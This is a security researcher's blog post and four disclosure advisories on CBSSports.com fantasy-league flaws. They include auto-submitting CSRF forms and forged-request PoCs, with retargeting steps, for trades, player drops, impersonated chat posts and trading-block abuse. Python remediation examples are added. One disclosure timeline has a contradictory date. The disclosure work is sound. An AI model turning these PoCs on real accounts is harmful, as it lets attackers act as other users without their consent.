I want to start by thanking the folks at CBS Interactive and CBS Corporation for working so diligently with me on remediating the issues I discovered, and for responsibly disclosing these issues.

I am unlikely to ever play in the NFL.

I am less likely to ever play in MLB.

So, instead I play fantasy sports, and I play primarily on CBSSports.com. It is the site my friends were using when I joined their leagues, and I haven't seen a need to change.

Last year, I discovered a few unintended features within the CBSSports sites. It started when I realized that I could CSRF the Trade and the Add/Drop functionality. After a little more digging, I realized I didn't need to CSRF the trade functionality... Instead I could simply initiate a trade on another team's behalf.

You would think that knowing this I should have won my league.  Personally, I blame this epic fail on Cam Newton's slow start and Brandon Lloyd's cement hands. 

 

Mrs. Newton's favorite player. 

The folks at CBS Interactive and CBS Corporation were kind enough to take a look at the issues I had discovered, remediate these issues, and keep me involved during the entire process.

Of course, I couldn't leave well enough alone, so I took another look at the site and realized there were a few other issues that should be looked at.  

I am not sure about your league, but our league utilizes a lot of smack talk. 

Smack Talk (smak tawk): 

The art of telling another person off, belittling them or calling their momma fat, while in the heat of competition.

CBSSports sites have a number of ways to accomplish this, one of which is the Live Scoreboard Chat functionality.  Fortunately (or unfortunately, depending on your point of view), I found a way to submit chat posts on behalf of other teams.  It really made the conversation devolve quickly, as seen below.

 

Sorry, this is a family friendly blog. 

Lastly, I discovered an issue where I could update my "On the Block" section with players I don't even own.  It is kind of like trying to sell someone the Brooklyn Bridge, but instead of a bridge it is Mike Trout.  The deception won't last long, but is likely to give the Trout owner a heart attack.

So, feel free to take a look at the disclosures, and if you notice anything else, please let the fine people at CBS know (security.incidents@cbs.com)!

CBSSports.com Horizontal Access Control Bypass (Trades & Add/Drop)

CBSSports.com Cross-Site Request Forgery

CBSSports.com Horizontal Access Control Bypass (Scoreboard Chat)

CBSSports.com Horizontal Access Control Bypass (Trading Block)

 

Author: Christopher Emerson

Summary
=========
The CBSSports.com fantasy sports sites do not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to send Trade and Add/Drop requests on behalf of an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 01/09/2013
Vendor fixed: 02/22/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed on CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the authenticated user is authorized to act for the team named in the request. In this instance, a CBSSports.com user can successfully submit Trade and Add/Drop requests to the application on behalf of other legitimate users.

Impact
=======
A malicious user could execute Trade and Add/Drop requests on behalf of a legitimate user.

Solution
========
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML code is included as a Proof-of-Concept (PoC). The PoC is designed to trick a team into offering Victor Martinez in a trade without the player's owner initiating the request. The code below should be copied and pasted into an HTML file, although the actual exploit can be hosted on the Internet for ease of exploitation.

To reproduce this in your own environment, the PoC will need to be modified as detailed below.

 

<html>
<body>
<form name="XSRF_Trade_Player" action="http://vanilla.baseball.cbssports.com/api/league/transactions/trade" onsubmit="window.close()" method="POST">
<input type="hidden" name="payload" value="&#123;&quot;team&#95;from&quot;&#58;&quot;8&quot;&#44;&quot;team&#95;to&quot;&#58;&quot;6&quot;&#44;&quot;comment&quot;&#58;&quot;&quot;&#44;&quot;players&quot;&#58;&#91;&quot;367942&#58;8&#58;6&quot;&#93;&#44;&quot;draft&#95;picks&quot;&#58;&#91;&#93;&#125;"/>
<input type="hidden" name="resultFormat" value="json" />
<input type="hidden" name="responseFormat" value="json" />
<input type="submit" value="Submit form" />
</form>
<script> document.XSRF_Trade_Player.submit(); </script>
</body>
</html>

1. Change the URL to the target league.
2. Set team_from to the opposing team's ID number ('8' in the example above). This is the team the forged offer will appear to come from.
3. Set team_to to your own team's ID number ('6' in the example above).
4. Set the players entry to the targeted player's ID number (e.g., 367942 for Victor Martinez). The two team IDs that follow it ('367942:8:6' above) must match the values chosen in steps 2 and 3.

The attacker opens this file from his or her own PC while authenticated to the league. When the file is opened, CBSSports.com processes the JSON request without confirming that the authenticated user owns team_from, so the resulting trade offer appears to originate from the opposing team.
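The check the Solution section calls for, written out as an added example (this is not code from the advisory or from CBS): a request handler that accepts the PoC's payload, first as the site behaved and then with authorization derived from the session. The team-to-owner mapping, the rosters, the session usernames and the function names are assumptions made for the example; the payload string is the PoC's form value with its HTML entities decoded.

```python
import json

# Constructed data for this example (not from the advisory): which user owns each
# team ID, and which player IDs sit on each roster. Team 8 holds 367942, the
# Victor Martinez ID used in the PoC; team 6 is the attacker's own team.
TEAM_OWNERS = {"6": "attacker", "8": "victim"}
ROSTERS = {"6": {"100001", "100002"}, "8": {"367942", "100003"}}

# The PoC's 'payload' form field as the browser submits it (HTML entities decoded).
POC_PAYLOAD = ('{"team_from":"8","team_to":"6","comment":"",'
               '"players":["367942:8:6"],"draft_picks":[]}')


class AccessDenied(Exception):
    """The authenticated user may not perform the requested action."""


def parse_trade(raw_payload):
    """Parse the trade JSON; each players entry is 'player_id:source_team:dest_team'."""
    payload = json.loads(raw_payload)
    moves = [tuple(entry.split(":")) for entry in payload["players"]]
    if any(len(m) != 3 for m in moves):
        raise ValueError("malformed players entry")
    return payload["team_from"], payload["team_to"], moves


def create_offer(team_from, team_to, moves):
    """Stand-in for persisting the offer; returns what the counterparty would see."""
    return {"status": "offer_created", "from": team_from, "to": team_to,
            "players": [player_id for player_id, _, _ in moves]}


def vulnerable_trade(session_user, raw_payload):
    """Mirrors the flaw: team_from is read from the request body and never
    compared with the owner of the authenticated session."""
    team_from, team_to, moves = parse_trade(raw_payload)
    return create_offer(team_from, team_to, moves)


def hardened_trade(session_user, raw_payload):
    """Authorize every identity in the payload against the session and roster data."""
    team_from, team_to, moves = parse_trade(raw_payload)
    # 1. The offering team must belong to the user behind the session cookie.
    if TEAM_OWNERS.get(team_from) != session_user:
        raise AccessDenied("session user does not own team_from")
    # 2. The counterparty must be a real, different team in the league.
    if team_to not in TEAM_OWNERS or team_to == team_from:
        raise AccessDenied("invalid team_to")
    # 3. Each player moves between exactly these two teams and is actually on the
    #    roster it is said to leave (a two-way trade lists moves in both directions).
    for player_id, src, dst in moves:
        if {src, dst} != {team_from, team_to}:
            raise AccessDenied(f"player {player_id} routed outside the trade")
        if player_id not in ROSTERS[src]:
            raise AccessDenied(f"player {player_id} is not on team {src}")
    return create_offer(team_from, team_to, moves)


def decide(handler, session_user, raw_payload):
    """Run a handler and report 'allowed' or 'denied'."""
    try:
        handler(session_user, raw_payload)
        return "allowed"
    except AccessDenied:
        return "denied"


if __name__ == "__main__":
    # The attacker (team 6) replays the PoC payload that names team 8 as the offerer.
    print("vulnerable:", vulnerable_trade("attacker", POC_PAYLOAD))
    print("hardened:  ", decide(hardened_trade, "attacker", POC_PAYLOAD))
    print("legit owner:", decide(hardened_trade, "victim", POC_PAYLOAD))
```

The point of the hardened handler is that nothing identifying the actor is taken from the body: team_from is only accepted if the session's user owns it, and every player is checked against the roster it is supposedly leaving, which also closes the variant where an owner offers players he does not have.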

 

Figure 1. Opponent’s team containing Victor Martinez before the horizontal access control exploit.

Figure 2. Attacker's team's trade page displaying no current trade offers.

Figure 3. Capture of the request that is sent when the PoC is executed.

 

Figure 4. Capture of the response that is sent when the PoC is executed.

Figure 5. Attacker’s team’s trade page displaying the unauthorized trade offer from the opponent’s team.

 

Disclosure Timeline
==================
January 9, 2013: Disclosed to vendor (CBS Corporation).
January 10, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
February 26, 2013: Confirmed successful vendor remediations.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.


Summary
=========
The CBSSports.com fantasy sports sites do not prevent unauthorized execution of sensitive operations initiated outside the authorized application workflow. This behavior could be leveraged by an attacker through a Cross-Site Request Forgery (CSRF) attack in order to modify an opponent’s team and/or lineup. 

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 01/09/2013
Vendor fixed: 02/22/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed on CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the user actually invoked the actions. When a CBSSports.com customer navigates to a page or clicks a link that includes a maliciously crafted POST request, that user's web browser makes a request to the applicable CBSSports.com fantasy site. If the user is currently authenticated to the CBSSports.com fantasy site, the scripted action within the request is executed with the privileges of the authenticated user.

Impact
=======

Attackers could trick authenticated users into submitting malicious requests to the application, including trade offers and add/drop requests.

Solution
======== 
Utilize cryptographically secure random tokens stored within a hidden form field or the application URL (but not within a cookie) for all pages that perform sensitive operations. Prefer the hidden field: a token carried in the URL can leak through the Referer header, browser history and server logs. Use each token value only once. The application should verify token values before performing sensitive operations, and should terminate authenticated sessions upon encountering incorrect token values.

Alternatively, a secondary round of user authentication could be required for all requests that perform sensitive operations, performing the sensitive operations only upon successful re-authentication.
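The synchronizer-token pattern described above, as an added example in Python (not code from the advisory or from CBS). It models the add-drop endpoint the PoC targets with an in-memory session store, issues one random token per rendered form, accepts each token only once, and ends the session on a bad token as the Solution recommends. The session IDs, the store layout and the csrf_token field name are assumptions for the example; the form field names and the player ID come from the PoC.

```python
import hmac
import secrets


# Constructed session store for this example (not from the advisory): session cookie
# value -> authenticated user and the player IDs on that user's roster. 182335 is the
# Alex Henery ID from the PoC.
def make_sessions():
    return {"sid-victim": {"user": "victim", "roster": {"182335", "100001"}}}


# The fields the PoC form posts to /transactions/add-drop.
POC_FORM = {"form::form": "form", "drop_action": "drop", "form::to_drop": "182335"}


class CsrfTokens:
    """Synchronizer tokens: unpredictable, bound to one session, valid for one use."""

    def __init__(self):
        self._outstanding = {}  # session_id -> set of issued-but-unused tokens

    def issue(self, session_id):
        """Called when rendering a page that performs a sensitive operation;
        the token goes into a hidden form field, never into a cookie."""
        token = secrets.token_urlsafe(32)
        self._outstanding.setdefault(session_id, set()).add(token)
        return token

    def consume(self, session_id, presented):
        """True only if 'presented' is an unused token for this session; burns it."""
        if not presented:
            return False
        for token in list(self._outstanding.get(session_id, ())):
            # constant-time comparison; encode so non-ASCII input cannot raise
            if hmac.compare_digest(token.encode(), presented.encode()):
                self._outstanding[session_id].discard(token)
                return True
        return False


def apply_add_drop(session, form):
    """The transaction itself, shared by both handlers."""
    if form.get("drop_action") == "drop":
        session["roster"].discard(form["form::to_drop"])
        return "dropped"
    return "no-op"


def vulnerable_add_drop(sessions, session_id, form):
    """Mirrors the flaw: any POST that carries a valid session cookie is honoured,
    whether or not the user ever saw the add/drop page."""
    session = sessions.get(session_id)
    if session is None:
        return "not authenticated"
    return apply_add_drop(session, form)


def hardened_add_drop(sessions, tokens, session_id, form):
    """Demand a fresh token from the hidden field; a missing or wrong token ends the
    session, as the Solution above recommends, so an attacker cannot keep guessing."""
    session = sessions.get(session_id)
    if session is None:
        return "not authenticated"
    if not tokens.consume(session_id, form.get("csrf_token")):
        del sessions[session_id]
        return "csrf check failed"
    return apply_add_drop(session, form)


if __name__ == "__main__":
    sessions, tokens = make_sessions(), CsrfTokens()
    print("vulnerable, PoC form:", vulnerable_add_drop(sessions, "sid-victim", POC_FORM))
    sessions = make_sessions()
    print("hardened, PoC form:  ", hardened_add_drop(sessions, tokens, "sid-victim", POC_FORM))
    sessions = make_sessions()
    legit = dict(POC_FORM, csrf_token=tokens.issue("sid-victim"))
    print("hardened, real form: ", hardened_add_drop(sessions, tokens, "sid-victim", legit))
    print("hardened, replayed:  ", hardened_add_drop(sessions, tokens, "sid-victim", legit))
```

The PoC page in the next section cannot supply a valid csrf_token: the value is random per session and the attacker's page cannot read the victim's rendered form across origins, so the forged POST fails the check even though the browser attaches the victim's cookies. Browser-side help such as SameSite cookie attributes did not exist in 2013-era browsers, which is why the server-side token was the primary control at the time and remains the one to rely on.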

Proof-of-Concept 
================
White Oak Security has included sample HTML code as a Proof-of-Concept (PoC). The PoC is designed to drop placekicker Alex Henery from his owner's team. The code below should be copied and pasted into an HTML file, although the actual exploit can be hosted on the Internet for ease of exploitation.

To reproduce this in your own environment, the PoC will need to be modified as detailed below.

 

<html>
<body>
<form name="XSRF_Drop_Player" action="http://mfa55.football.cbssports.com/transactions/add-drop" method="POST">
<input type="hidden" name="form&#58;&#58;form" value="form" />
<input type="hidden" name="drop&#95;action" value="drop" />
<input type="hidden" name="form&#58;&#58;to&#95;drop" value="182335" />
</form>
<script>
document.XSRF_Drop_Player.submit();
</script>
</body>
</html>
  1. Change the URL to the target league.
  2. Change the value to the player's ID number (e.g., 182335 for Alex Henery).

This file (or a link to a web hosted copy of it) must then be sent to the owner of the targeted player, Alex Henery. When the owner opens it while authenticated, the browser submits the form with the owner's session cookies attached, so the request inherits the identity and privileges of the authenticated user. The CBSSports.com site then processes the drop request without proceeding through the site's normal workflow and without confirming that the user actually invoked the request.

Figure 1. Test team containing Alex Henery before the CSRF exploit

Figure 2. Capture of the Request that is sent once the proof of concept is executed

The image above shows the session information and cookies that are inherited by the malicious request.

Figure 3. Test team missing Alex Henery after the CSRF exploit

 

Disclosure Timeline
==================
January 9, 2013: Disclosed to vendor (CBS Corporation).
January 10, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
February 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.


Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to post messages to the Scoreboard Chat as an opposing team without the opposing team’s interaction, knowledge, or consent.

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the authenticated user is the one the request claims to act for. In this instance, a CBSSports.com customer can post Scoreboard Chat messages attributed to other legitimate users by supplying the target's username in the from field of the submitted chat message.

Impact
=======
A malicious user could post Scoreboard Chat messages as an opposing team's owner without the opposing team’s interaction, knowledge, or consent.   

Solution
======== 
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept 
================
The following HTML form is included as a Proof-of-Concept (PoC). It posts a Scoreboard Chat message whose from field names another team's owner.

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat&#95;domain" value="vanilla&#46;baseball&#46;cbssports&#46;com" />
<input type="hidden" name="chat&#95;msg" value="&#123;&quot;event&quot;&#58;&quot;public&quot;&#44;&quot;from&quot;&#58;&quot;the_mcsass&#64;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;payload&quot;&#58;&#123;&quot;body&quot;&#58;&quot;Sharknado2&#92;n&quot;&#125;&#44;&quot;to&quot;&#58;&quot;vanilla&#46;baseball&#46;cbssports&#46;com&quot;&#44;&quot;type&quot;&#58;&quot;message&quot;&#125;" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

  1. Change the URL to the target league.
  2. Change the username in the from field ('the_mcsass' in the example above) to the target user's username.
  3. Replace the body value ('Sharknado2' above) with the message you want posted.

This file, or a link to a web hosted version of it, is opened by the malicious user while authenticated to the league. The request is sent with the malicious user's own session, but the application attributes the stored message to the username supplied in the from field rather than to the account behind that session.

A decoded version of the request above is included to make it a little easier to read.

<html>
<body>
<form action="http://vanilla.baseball.cbssports.com/data/chat/store-message?client_type=scoreboardChat.openbaseball.mgmt" method="POST">
<input type="hidden" name="chat_domain" value="vanilla.baseball.cbssports.com" />
<input type="hidden" name="chat_msg" value="{"event":"public","from":"the_mcsass@vanilla.baseball.cbssports.com","payload":{"body":"Sharknado2\n"},"to":"vanilla.baseball.cbssports.com","type":"message"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
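
Server-side attribution of the chat sender, as an added example (not code from the advisory or from CBS). The vulnerable handler stores whatever the client put in the from field, which is what the PoC exploits; the hardened one discards that field, takes the sender from the session, and confirms that the session's user is a member of the league whose chat_domain was given. The session store, the league membership table and the function names are assumptions for the example; the form fields are the decoded PoC values.

```python
import json

# Constructed data for this example (not from the advisory): session cookie -> user,
# and which users belong to each league chat domain. 'the_mcsass' is the username
# impersonated in the PoC; 'attacker' holds the session that sends the request.
SESSIONS = {"sid-attacker": "attacker"}
LEAGUE_MEMBERS = {"vanilla.baseball.cbssports.com": {"attacker", "the_mcsass"}}

# The PoC form fields as the browser submits them (HTML entities decoded).
POC_FORM = {
    "chat_domain": "vanilla.baseball.cbssports.com",
    "chat_msg": json.dumps({
        "event": "public",
        "from": "the_mcsass@vanilla.baseball.cbssports.com",
        "payload": {"body": "Sharknado2\n"},
        "to": "vanilla.baseball.cbssports.com",
        "type": "message",
    }),
}


def vulnerable_store_message(session_id, form):
    """Mirrors the flaw: the session only proves someone is logged in; the stored
    sender is whatever the client wrote into 'from'."""
    if session_id not in SESSIONS:
        return None
    msg = json.loads(form["chat_msg"])
    return {"from": msg["from"], "body": msg["payload"]["body"],
            "domain": form["chat_domain"]}


def hardened_store_message(session_id, form):
    """Sender identity is derived from the session and the client's 'from' is
    ignored; the chat domain must be a league the session's user belongs to."""
    user = SESSIONS.get(session_id)
    if user is None:
        return None
    domain = form["chat_domain"]
    if user not in LEAGUE_MEMBERS.get(domain, set()):
        return None  # logged in, but not a member of this league's chat
    msg = json.loads(form["chat_msg"])
    if msg.get("to") != domain or msg.get("type") != "message":
        return None  # the envelope must describe the same room it is posted to
    return {"from": f"{user}@{domain}", "body": msg["payload"]["body"],
            "domain": domain}


if __name__ == "__main__":
    print("vulnerable:", vulnerable_store_message("sid-attacker", POC_FORM))
    print("hardened:  ", hardened_store_message("sid-attacker", POC_FORM))
```

Overwriting rather than rejecting is the right shape here: the client never has a legitimate reason to tell the server who is speaking, so the field should not exist as an input at all. The same reasoning applies to the trading-block request later on this page, where the player to be advertised must be checked against the roster of the session's own team.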

Disclosure Timeline
==================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediation.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.

 


Summary
=========
The CBSSports.com fantasy sports sites did not properly enforce access control between user accounts at the same privilege level within the application. This behavior could be leveraged by an attacker to send Trading Block notifications containing an opposing team's player without the opposing team’s interaction, knowledge, or consent.  

CVE number: Not Assigned
Impact: Medium
Vendor homepage: http://www.cbssports.com/
Vendor notified: 08/25/2013
Vendor fixed: 09/26/2013
Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/)

Affected Products
=================
Confirmed in CBS Sports Fantasy Football and Fantasy Baseball properties. Other fantasy sports sites may have also been affected.

Details
=======
CBSSports.com fantasy sites allow authenticated users to perform sensitive actions without verifying that the authenticated user is authorized to act on the objects named in the request. In this instance, a CBSSports.com customer can add players owned by other legitimate users to his or her own Trading Block by supplying the player's ID number in the block-data request.

Impact
=======
A malicious user could send Trading Block notifications containing an opposing team's player without the opposing team’s interaction, knowledge, or consent.  This notification does not originate from the legitimate user's account, but from the malicious user's account.

Solution
========
Enforce proper access control between user accounts at the same privilege level within the application. Implement access control decisions based on the permissions granted to the authenticated user associated with the submitted session identifier.

Proof-of-Concept
================
The following URL is included as a Proof-of-Concept (PoC). The PoC executes when a malicious user who is authenticated to the league clicks the link.

To reproduce this in your own environment, the proof of concept will need to be modified as detailed below.

http://vanilla.baseball.cbssports.com/transactions/trade/block-data/1796123/-1/-1/-1/-1/1

  1. Change the URL to the target league.
  2. Change the value to the player's ID number (e.g., 1796123 for Jurickson Profar).

This link, when clicked by a malicious user who currently has an authenticated session to the CBS Sports fantasy league, will update the malicious user's Trade Block with the targeted player, even if they do not own said player.

The site's Trading Block will not display the target player if the malicious user does not own the target player, but email notification updates to league members will include the target player.

Here is a copy of what the request would look like when the malicious user clicks on the link:

GET /transactions/trade/block-data/1796123/-1/-1/-1/-1/1 HTTP/1.1
Host: vanilla.baseball.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36
Accept: */*
Referer: http://vanilla.baseball.cbssports.com/transactions/trade?selected_app_id=CBS1019
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: <redacted>

Disclosure Timeline
==================
August 25, 2013: Disclosed to vendor (CBS Corporation).
August 26, 2013: Vendor’s initial response.
February 22, 2013: Vendor stated vulnerability had been remediated and a Responsible Disclosure policy was being drafted.
September 26, 2013: Confirmed successful vendor remediations.
September 26, 2013: Received vendor's Responsible Disclosure Policy.
September 30, 2013: Disclosed vulnerability publicly.
